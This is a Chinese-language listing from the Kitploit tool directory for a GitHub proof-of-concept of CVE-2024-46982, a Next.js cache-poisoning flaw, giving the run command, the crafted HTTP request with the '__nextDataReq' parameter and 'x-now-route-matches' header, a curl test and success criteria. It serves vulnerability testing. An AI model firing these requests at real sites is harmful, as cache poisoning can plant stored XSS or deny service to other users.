Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-46982 — CVE-2024-46982 的 PoC | Kitploit
工具/GitHubGitHub/lercas/cve-2024-46982
漏洞分析漏洞利用Web应用程序漏洞利用Web安全
GitHublercas/cve-2024-46982

CVE-2024-46982

CVE-2024-46982 的 PoC

查看仓库
5111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Next.js 缓存投毒漏洞利用

该工具可自动检测并利用 CVE-2024-46982,这是 Next.js 中的一个缓存投毒漏洞,服务端渲染(SSR)响应可能被错误地缓存为静态站点生成(SSG)响应。此类配置错误可能导致存储型 XSS、DoS 和数据泄露,使攻击者能够向缓存响应中注入恶意内容。

安装与使用

准备目标列表

创建一个名为 targets.txt 的文件,每行包含一个目标 URL:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

定义自定义 Payload

创建一个名为 payloads.txt 的文件,其中包含将通过 User-Agent 请求头注入的 Payload:

root@kitploit:~

运行漏洞利用

使用以下命令编译并执行漏洞利用:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

工作原理

  • 从 targets.txt 读取目标 URL 列表
  • 遍历每个目标并附加易受攻击的端点:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • 发送多个请求,每个请求使用 payloads.txt 中不同的 Payload
  • 分析 HTTP 响应,判断是否注入成功:
    • 如果响应正文中出现该 Payload → 目标存在漏洞
    • 如果响应码为 200 OK 且缓存行为异常 → 可能存在漏洞
    • 如果响应码为 403 Forbidden 或 404 Not Found → 很可能已修补
  • 测试完所有目标后显示结果

手动验证方法

使用 curl 发送恶意请求:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

在浏览器中访问该端点

环境要求

  • Go 1.21 或更高版本。
下载工具